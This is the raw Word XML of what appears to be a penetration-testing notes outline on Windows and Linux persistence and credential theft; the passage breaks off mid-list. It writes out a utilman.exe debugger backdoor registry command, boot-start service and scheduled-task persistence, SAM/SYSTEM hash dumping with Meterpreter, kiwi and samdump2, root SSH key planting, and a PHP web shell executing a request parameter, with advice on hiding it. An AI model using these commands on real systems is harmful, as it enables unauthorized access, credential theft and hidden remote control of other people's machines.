    <w:p w14:paraId="3C6B00A3" w14:textId="1282BE21" w:rsidR="004933FA" w:rsidRDefault="004933FA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>load Powershell into meterpreter using “load powershell”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B300F89" w14:textId="3CC4B7E7" w:rsidR="004933FA" w:rsidRDefault="004933FA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>drop into a Powershell shell “powershell_shell”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CFF06F" w14:textId="676E19CD" w:rsidR="004933FA" w:rsidRDefault="004933FA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Create Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E0AE6F" w14:textId="0CC80530" w:rsidR="004933FA" w:rsidRDefault="004933FA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>New-Service -Name “&lt;Service Name&gt;” -BinaryPathName “&lt;Path-to-Binary&gt;” -Description “&lt;SERVICE_DESCRIPTION&gt;” -StartupType “Boot”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707BB35D" w14:textId="6C46D697" w:rsidR="004933FA" w:rsidRDefault="004933FA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>will say stopped but will start automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A34BCC" w14:textId="73871A7A" w:rsidR="004933FA" w:rsidRDefault="004933FA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Scheduled Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210FA026" w14:textId="573F7EC1" w:rsidR="004933FA" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used to schedule the launch of specific programs or scripts at a pre-defined time or condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EE87C2" w14:textId="0A65000E" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Powershell can be used to create a scheduled task and assure persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBFBF4C" w14:textId="0259A236" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need to define multiple cmdlets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B0B61A" w14:textId="3E13D972" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>New-ScheduledTaskAction – define the action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30740ACF" w14:textId="48381C40" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>New-ScheduledTaskTrigger – define trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5BC76E" w14:textId="60AB855A" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>New-ScheduledTaskPrincipal – user the task will run as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADABF0E" w14:textId="424E2492" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>New-ScheduledTaskSettingsSet – set above settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD62C5E" w14:textId="091D3635" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Register-ScheduledTask – creates task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B54A4C" w14:textId="5B2BEE49" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Set each using variables $A-$E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F614EE5" w14:textId="1ACB2B92" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>$E = $A-$D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F533589" w14:textId="7230C6F9" w:rsidR="00FE7C20" w:rsidRDefault="00FE7C20" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Backdooring RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E24CF" w14:textId="7A2C865B" w:rsidR="00FE7C20" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>backdoor on-screen keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192B4FEA" w14:textId="030889C2" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit sticky_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79999B6F" w14:textId="6A851DDE" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sign out/Lock account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7C05F" w14:textId="7665149E" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>press Windows Key + U and choose OSK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4D9A0" w14:textId="68843B22" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Edit Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD7E7D" w14:textId="3E5FE8D7" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A808E1">
        <w:t>REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00744FFC" w14:textId="1229BB42" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hash Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66019E0D" w14:textId="3EB31A64" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit hashdump/kiwi module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78084A90" w14:textId="59D34BE4" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; run post/windows/gather/hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1341CC" w14:textId="4B40E434" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Save SAM and SYSTEM registries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F8552" w14:textId="2F2FE85A" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reg save HKLM\SAM C:\Users\Administrator\Desktop\SAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF18F8C" w14:textId="0BA1565C" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change SAM to SYSTEM (both sides)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A485B" w14:textId="5CFA5EB8" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>downloading files and using samdump2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C10B2E8" w14:textId="1B7E006B" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; cd ‘C:\Users\Administrator\Desktop’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE2B90D" w14:textId="7FAE419A" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; download SAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B17BAAA" w14:textId="477AC3F7" w:rsidR="00A808E1" w:rsidRDefault="00A808E1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; download SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCAB94" w14:textId="59A4B359" w:rsidR="00A808E1" w:rsidRDefault="007E51E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>samdump2 SYSTEM SAM (on attacker computer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E815093" w14:textId="14A81607" w:rsidR="007E51E4" w:rsidRDefault="007E51E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61B64E" w14:textId="3DCAA81F" w:rsidR="007E51E4" w:rsidRDefault="007E51E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; lsa_dump_sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A085C1" w14:textId="6411DB51" w:rsidR="007E51E4" w:rsidRDefault="007E51E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C17A931" w14:textId="18972D01" w:rsidR="007E51E4" w:rsidRDefault="007E51E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; lsa_dump_sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA64E42" w14:textId="30F0FEFC" w:rsidR="00AD402F" w:rsidRDefault="00AD402F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Linux Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC9D15" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSH Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13234B" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Consists of leaving ssh keys in some users home directory (ideally root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183DC6F8" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Generate ssh keyset with ssh-keygen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1506DFF4" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ssh-keygen command will generate one public and one private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CA4E89" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>go to /root/.ssh (or create .ssh directory with mkdir) and leave public key there after renaming it authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4333AEC4" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>give private key permissions with chmod 600 id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C47C9B" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>login using ssh -I id_rsa root@&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED1342" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PHP Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E08B9B9" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Search for web root in /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC9B3AB" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>whatever is left here will be available for everybody to use in their browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE6936" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>try creating a php file that takes a cmd parameter and executes anything within that parameter from GET or POST data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1616F80A" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A364CB0" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRPr="000C2CBC" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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C2CBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2CBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (isset($_REQUEST['cmd'])) {</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2CBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        echo "&lt;pre&gt;" . shell_exec($_REQUEST['cmd']) . "&lt;/pre&gt;";</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2CBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2CBC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6028A020" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">if left in /var/www/html/shell.php, access directly using </w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidRPr="004E75C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip/shell.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidRPr="004E75C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip/directory/shell.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1193E191" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>to hide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71412767" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>try adding in existing php files in /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B918F4E" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>change cmd parameter to another name that is not common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A338AF6" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CronJob Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666E14D" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>within /etc/cronjob directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DE09F6" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>view tasks scheduled to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830E4AE" w14:textId="77777777" w:rsidR="004F2EC1" w:rsidRDefault="004F2EC1" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
